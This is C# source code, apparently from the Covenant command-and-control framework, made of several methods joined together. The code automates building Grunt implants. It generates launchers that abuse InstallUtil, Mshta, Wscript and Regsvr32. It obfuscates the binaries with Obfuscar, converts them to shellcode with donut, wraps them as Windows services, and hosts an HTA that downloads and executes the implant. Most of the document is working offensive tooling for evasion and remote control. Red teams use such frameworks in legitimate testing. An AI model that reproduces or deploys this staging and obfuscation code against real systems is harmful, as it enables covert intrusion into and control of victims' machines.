public Task <InstallUtilLauncher> GenerateInstallUtilHostedLauncher(HostedFile file)
{
return(_connection.InvokeAsync <InstallUtilLauncher>("GenerateInstallUtilHostedLauncher", file));
}
public Task <MshtaLauncher> GenerateMshtaHostedLauncher(HostedFile file)
{
return(_connection.InvokeAsync <MshtaLauncher>("GenerateMshtaHostedLauncher", file));
}
public Task <HostedFile> EditHostedFile(int listenerId, HostedFile file)
{
return(_connection.InvokeAsync <HostedFile>("EditHostedFile", listenerId, file));
}
public Task <BinaryLauncher> GenerateBinaryHostedLauncher(HostedFile file)
{
return(_connection.InvokeAsync <BinaryLauncher>("GenerateBinaryHostedLauncher", file));
}
public async Task <HostedFile> MakeCreateHostedFile(int listenerId, HostedFile hostedFile)
{
var result = await Api.ApiListenersByIdHostedfilesPostWithHttpMessagesAsync(listenerId, hostedFile);
return(result.Body);
}
public Task <HostedFile> CreateHostedFile(HostedFile file)
{
return(_connection.InvokeAsync <HostedFile>("CreateHostedFile", file));
}
public async Task <int> ProvisionSvcBinaryServiceGrunt(HttpListener listener, BinaryLauncher smbLauncher, string aGuid, string dataDir, string obfuscatedBinPath)
{
var request = new RequestBuilder(Api);
var svcGuid = aGuid + "svc";
var projDir = Path.Join(dataDir, svcGuid);
if (!Directory.Exists(projDir))
{
Directory.CreateDirectory(projDir);
}
if (!Directory.Exists(Path.Join(projDir, "Properies")))
{
Directory.CreateDirectory(Path.Join(projDir, "Properties"));
}
Console.WriteLine($"Generating csproj for {svcGuid}");
var csproj = GenerateServiceBinaryCsprojFile(svcGuid, projDir);
var csprojName = svcGuid + ".csproj";
var csprojPath = Path.Join(projDir, csprojName);
File.WriteAllBytes(csprojPath, Encoding.ASCII.GetBytes(csproj));
Console.WriteLine($"Generating program.cs for {svcGuid}");
var programCs = GenerateServiceProgramCsFile(svcGuid, projDir);
var programCsName = "Program.cs";
var programCsPath = Path.Join(projDir, programCsName);
File.WriteAllBytes(programCsPath, Encoding.ASCII.GetBytes(programCs));
Console.WriteLine($"Generating service runner {svcGuid}.cs for {svcGuid}");
var payload = Convert.ToBase64String(File.ReadAllBytes(obfuscatedBinPath));
var runnerCs = GenerateServiceRunnerCsFile(svcGuid, projDir, payload);
var runnerCsName = svcGuid + ".cs";
var runnerCsPath = Path.Join(projDir, runnerCsName);
File.WriteAllBytes(runnerCsPath, Encoding.ASCII.GetBytes(runnerCs));
Console.WriteLine($"Generating service runner {svcGuid}.Designer.cs for {svcGuid}");
var designerCs = GenerateServiceDesignerCsFile(svcGuid, projDir);
var designerCsName = svcGuid + ".Designer.cs";
var designerCsPath = Path.Join(projDir, designerCsName);
File.WriteAllBytes(designerCsPath, Encoding.ASCII.GetBytes(designerCs));
Console.WriteLine("Loading AssemblyInfo for prgramatic build");
var assemblyInfo = GenerateAssemblyInfo(svcGuid);
var assemblyInfoName = "AssemblyInfo.cs";
var assemblyInfoPath = Path.Join(Path.Join(projDir, "Properties"), assemblyInfoName);
Console.WriteLine($"Saving Assembly Info for {svcGuid}");
File.WriteAllBytes(assemblyInfoPath, Encoding.ASCII.GetBytes(assemblyInfo));
if (System.Runtime.InteropServices.RuntimeInformation.IsOSPlatform(OSPlatform.Windows))
{
var msbuildPath = FindMsBuildExePath();
if (!String.IsNullOrEmpty(msbuildPath))
{
RunMsbuildForGrunt(svcGuid, projDir, msbuildPath, csprojName);
var hostedUrlPath = "/" + svcGuid + ".exe";
Console.WriteLine($"Hosting obfsucated service svc binary at path {hostedUrlPath}");
var hostedBin = new HostedFile();
hostedBin.ListenerId = listener.Id;
hostedBin.Path = hostedUrlPath;
hostedBin.Content = Convert.ToBase64String(File.ReadAllBytes(Path.Join(projDir, svcGuid + ".exe")));
hostedBin = await request.CreateHostedFile((int)listener.Id, hostedBin);
File.Move(Path.Join(projDir, svcGuid + ".exe"), Path.Join(dataDir, svcGuid + ".exe"));
Console.WriteLine($"Grunt generation complete for {svcGuid}");
}
else
{
Console.WriteLine($"Not able to find directory in C:\\Windows\\Microsoft.Net\\Framework that starts with 'v4.'. Can't find msbuild.exe");
}
}
else
{
Console.WriteLine("Not on windows. Skipping msbuild.");
}
return(await Task.FromResult(0));
}
public Task <WscriptLauncher> GenerateWscriptHostedLauncher(HostedFile file)
{
return(_connection.InvokeAsync <WscriptLauncher>("GenerateWscriptHostedLauncher", file));
}
public Task <ShellCodeLauncher> GenerateShellCodeHostedLauncher(HostedFile file)
{
return(_connection.InvokeAsync <ShellCodeLauncher>("GenerateShellCodeHostedLauncher", file));
}
public async Task <string> ProvisionBinaryGrunt(HttpListener listener, BinaryLauncher smbLauncher, string aGuid, string dataDir, string nugetExePath, string donutExePath)
{
var request = new RequestBuilder(Api);
var projDir = Path.Join(dataDir, aGuid);
if (!Directory.Exists(Path.Join(projDir, "Properies")))
{
Directory.CreateDirectory(Path.Join(projDir, "Properties"));
}
Console.WriteLine($"Generating csproj for {aGuid}");
var csproj = GenerateBinaryCsprojFile(aGuid, projDir);
var csprojName = aGuid + ".csproj";
var csprojPath = Path.Join(projDir, csprojName);
Console.WriteLine($"Saving csproj for {aGuid}");
File.WriteAllBytes(csprojPath, Encoding.ASCII.GetBytes(csproj));
var smbSrcPath = Path.Join(projDir, aGuid + ".cs");
Console.WriteLine("Saving SMB Grunt Stager Code");
File.WriteAllBytes(smbSrcPath, Encoding.ASCII.GetBytes(smbLauncher.StagerCode));
Console.WriteLine("Loading csproj for prgramatic build");
Console.WriteLine($"Generating Obfuscar for {aGuid}");
var obfuscar = GenerateObfuscarFile(aGuid, projDir);
var obfuscarName = aGuid + ".xml";
var obfuscarPath = Path.Join(projDir, obfuscarName);
Console.WriteLine($"Saving Obfuscar for {aGuid}");
File.WriteAllBytes(obfuscarPath, Encoding.ASCII.GetBytes(obfuscar));
var assemblyInfo = GenerateAssemblyInfo(aGuid);
var assemblyInfoName = "AssemblyInfo.cs";
var assemblyInfoPath = Path.Join(Path.Join(projDir, "Properties"), assemblyInfoName);
Console.WriteLine($"Saving Assembly Info for {aGuid}");
File.WriteAllBytes(assemblyInfoPath, Encoding.ASCII.GetBytes(assemblyInfo));
if (System.Runtime.InteropServices.RuntimeInformation.IsOSPlatform(OSPlatform.Windows))
{
var msbuildPath = FindMsBuildExePath();
if (!String.IsNullOrEmpty(msbuildPath))
{
RunInstallNugetDepsForGrunt(projDir, nugetExePath);
RunMsbuildForGrunt(aGuid, projDir, msbuildPath, csprojName);
var obfuscatedBinPath = RunObfuscarForGrunt(aGuid, projDir, dataDir, obfuscarPath);
var hostedUrlPath = "/" + aGuid + ".exe";
Console.WriteLine($"Hosting obfsucated smb binary at path {hostedUrlPath}");
var hostedBin = new HostedFile();
hostedBin.ListenerId = listener.Id;
hostedBin.Path = hostedUrlPath;
hostedBin.Content = Convert.ToBase64String(File.ReadAllBytes(obfuscatedBinPath));
hostedBin = await request.CreateHostedFile((int)listener.Id, hostedBin);
Console.WriteLine($"Grunt generation complete for {aGuid}");
// Was added to fix error but locking wasn't the issue, can remove
WaitForAvailable(Path.Join(dataDir, aGuid + ".exe"));
var shellcodePath = RunDonutForGrunt(aGuid, dataDir, donutExePath);
var shellcodeUrl = "/" + aGuid + ".bin";
Console.WriteLine($"Hosting obfuscated shellcode (donut) smb binary at path {shellcodeUrl}");
var hostedShellcode = new HostedFile();
hostedShellcode.ListenerId = listener.Id;
hostedShellcode.Path = shellcodeUrl;
hostedShellcode.Content = Convert.ToBase64String(File.ReadAllBytes(shellcodePath));
hostedShellcode = await request.CreateHostedFile((int)listener.Id, hostedShellcode);
// Service Versions
Console.WriteLine($"Grunt generation complete for {aGuid}");
return(obfuscatedBinPath);
}
else
{
Console.WriteLine($"Not able to find directory in C:\\Windows\\Microsoft.Net\\Framework that starts with 'v4.'. Can't find msbuild.exe");
}
}
else
{
Console.WriteLine("Not on windows. Skipping msbuild.");
}
return(await Task.FromResult(""));
}
public Task <string> ResolveFileUrlAsync(HostedFile hostedFile)
{
return(fileStorage.GetFileUrlAsync(hostedFile.FileSlug));
}
public async Task <ActionResult <WscriptLauncher> > GenerateWscriptHostedFileLauncher(HostedFile file)
{
try
{
return(await _service.GenerateWscriptHostedLauncher(file));
}
catch (ControllerNotFoundException e)
{
return(NotFound(e.Message));
}
catch (ControllerBadRequestException e)
{
return(BadRequest(e.Message));
}
}
public ActionResult <InstallUtilLauncher> GenerateInstallUtilHostedFileLauncher(HostedFile hostedFile)
{
InstallUtilLauncher launcher = (InstallUtilLauncher)_context.Launchers.FirstOrDefault(S => S.Type == Launcher.LauncherType.InstallUtil);
if (launcher == null)
{
return(NotFound());
}
Listener listener = _context.Listeners.FirstOrDefault(S => S.Id == hostedFile.ListenerId);
HostedFile savedHostedFile = _context.HostedFiles.FirstOrDefault(HF => HF.Id == hostedFile.Id);
if (listener == null || savedHostedFile == null)
{
return(NotFound());
}
string hostedLauncher = launcher.GetHostedLauncher(listener, savedHostedFile);
_context.Launchers.Update(launcher);
_context.SaveChanges();
return(Ok(launcher));
}
public Task <PowerShellLauncher> GeneratePowerShellHostedLauncher(HostedFile file)
{
return(_connection.InvokeAsync <PowerShellLauncher>("GeneratePowerShellHostedLauncher", file));
}
public async Task <HostedFile> FindOrCreateHostedDefaultHttpGruntHta(HttpListener listener, HostedFile hostedBinaryFile)
{
var request = new RequestBuilder(Api);
Console.WriteLine("Checking a /app.hta Script is already hosted");
foreach (HostedFile aHostedFile in await request.GetHostedFiles((int)listener.Id))
{
if (aHostedFile.Path == "/app.hta")
{
Console.WriteLine("Found existing /app.hta. Not creating a new one");
return(aHostedFile);
}
}
Console.WriteLine("Generating HTA Script That Dowloands/Execs Default Grunt Binary");
var hta = GeneratePullAndExecBinaryHta(listener, hostedBinaryFile);
Console.WriteLine("Hosting HTA Script That Dowloands/Execs Default Grunt Binary at /app.hta");
var hostedHta = new HostedFile();
hostedHta.ListenerId = listener.Id;
hostedHta.Path = "/app.hta";
hostedHta.Content = Convert.ToBase64String(Encoding.ASCII.GetBytes(hta));
return(await request.CreateHostedFile((int)listener.Id, hostedHta));
}
public Task <Regsvr32Launcher> GenerateRegsvr32HostedLauncher(HostedFile file)
{
return(_connection.InvokeAsync <Regsvr32Launcher>("GenerateRegsvr32HostedLauncher", file));
}
public async Task <int> RunAsync(string listenerName, string connectAddress, int connectPort, int smbGruntCount)
{
var request = new RequestBuilder(Api);
Console.WriteLine("Creating Data directories");
var pwd = Directory.GetCurrentDirectory();
var dataDir = Path.Join(pwd, "Data");
if (!Directory.Exists(dataDir))
{
Directory.CreateDirectory(dataDir);
}
HttpListener listener = await FindOrCreateListener(listenerName, connectAddress, connectPort);
Console.WriteLine($"Using listener {listener.Id} - {listener.Name}");
Console.WriteLine("Creating Basic HTTP Grunt Binary");
BinaryLauncher binaryLauncher = await GenerateBasicHttpGruntBinary(listener);
Console.WriteLine($"Using Binary Launcher {binaryLauncher.Name} - {binaryLauncher.Id}");
var defaultHttpBinPath = Path.Join(dataDir, "app.exe");
Console.WriteLine("Saving HTTP Grunt Binary");
File.WriteAllBytes(defaultHttpBinPath, Convert.FromBase64String(binaryLauncher.Base64ILByteString));
HostedFile hostedBinaryLauncher = await FindOrCreateHostedDefaultHttpGrunt(listener, binaryLauncher);
HostedFile hostedBinaryLauncherHta = await FindOrCreateHostedDefaultHttpGruntHta(listener, hostedBinaryLauncher);
var defaultHttpHtaPath = Path.Join(dataDir, "app.hta");
Console.WriteLine("Saving HTA Script That Dowloands/Execs Default Grunt Binary");
File.WriteAllBytes(defaultHttpHtaPath, Convert.FromBase64String(hostedBinaryLauncherHta.Content));
var nugetExePath = DownloadNugetExe(dataDir);
var donutExePath = DownloadDonutExe(dataDir);
if (System.Runtime.InteropServices.RuntimeInformation.IsOSPlatform(OSPlatform.Windows))
{
var shellcodePath = RunDonutForGrunt("app", dataDir, donutExePath);
var shellcodeUrl = "/app.bin";
Console.WriteLine($"Hosting default http binary shellcode (donut) at path {shellcodeUrl}");
var hostedShellcode = new HostedFile();
hostedShellcode.ListenerId = listener.Id;
hostedShellcode.Path = shellcodeUrl;
hostedShellcode.Content = Convert.ToBase64String(File.ReadAllBytes(shellcodePath));
hostedShellcode = await request.CreateHostedFile((int)listener.Id, hostedShellcode);
}
else
{
// Could dynamically ddownload linux donut binary and still run this technically
Console.Write("Not generating shellcode for default grunt because not on windows.");
}
var defaultObfuscatedBinPath = await ProvisionBinaryGrunt(listener, binaryLauncher, "http", dataDir, nugetExePath, donutExePath);
await ProvisionSvcBinaryServiceGrunt(listener, binaryLauncher, "http", dataDir, defaultObfuscatedBinPath);
for (int i = 0; i < smbGruntCount; i++)
{
var aGuid = Guid.NewGuid().ToString().Replace("-", "").Substring(0, 10);
BinaryLauncher smbLauncher = await GenerateBasicSmbGruntBinary(aGuid, listener);
var rawSmbBin = Convert.FromBase64String(smbLauncher.Base64ILByteString);
if (!Directory.Exists(Path.Join(dataDir, aGuid)))
{
Directory.CreateDirectory(Path.Join(dataDir, aGuid));
}
var smbBinPath = Path.Join(Path.Join(dataDir, aGuid), "Downloaded.exe");
Console.WriteLine("Saving Unobfuscated Grunt Binary");
File.WriteAllBytes(smbBinPath, rawSmbBin);
var obfuscatedBinPath = await ProvisionBinaryGrunt(listener, smbLauncher, aGuid, dataDir, nugetExePath, donutExePath);
if (!String.IsNullOrEmpty(obfuscatedBinPath))
{
await ProvisionSvcBinaryServiceGrunt(listener, smbLauncher, aGuid, dataDir, obfuscatedBinPath);
}
}
return(await Task.FromResult(0));
}
public virtual string GetHostedLauncher(Listener listener, HostedFile hostedFile)
{
return("");
}
public async Task <ActionResult <BinaryLauncher> > GenerateBinaryHostedLauncher(HostedFile file)
{
try
{
return(await _context.GenerateBinaryHostedLauncher(file));
}
catch (ControllerNotFoundException e)
{
return(NotFound(e.Message));
}
catch (ControllerBadRequestException e)
{
return(BadRequest(e.Message));
}
}